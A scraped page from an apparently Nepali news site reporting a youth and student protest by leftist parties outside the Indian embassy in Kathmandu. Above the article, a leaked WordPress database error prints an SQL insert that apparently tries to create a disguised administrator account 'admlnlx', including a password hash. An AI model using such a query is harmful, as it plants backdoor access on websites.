WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BPSDiKBxJTJWDF4zrRndISd1TBbrui1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 04:21:14', '', 'admlnlx', 'admlnlx')
काठमाडौं,मंसिर २०-
संविधान संशोधन प्रस्तावमा भारतीय हस्तक्षेप रहेको भन्दै प्रमुख प्रतिपक्षी नेकपा एमाले लगायतका केही दलका युवा र विद्यार्थीहरुले सोमबार भारतीय राजदूतावास बाहिर विरोध प्रदर्शन गरेका छन्।
नेकपा एमाले, नेकपा माले र राष्ट्रिय जनमोर्चाको युवा र विद्यार्थी संगठन सम्मिलित संयुक्त युवा विद्यार्थी अभियानले विरोध प्रदर्शन गरेको हो। विहान ११ बजेदेखि युवा र विद्यार्थीहरुले भारतीय हस्तक्षेप अन्त्य गर्नुपर्ने लगायतका नाराबाजी गर्नुका साथै र्याली निकालेका थिए।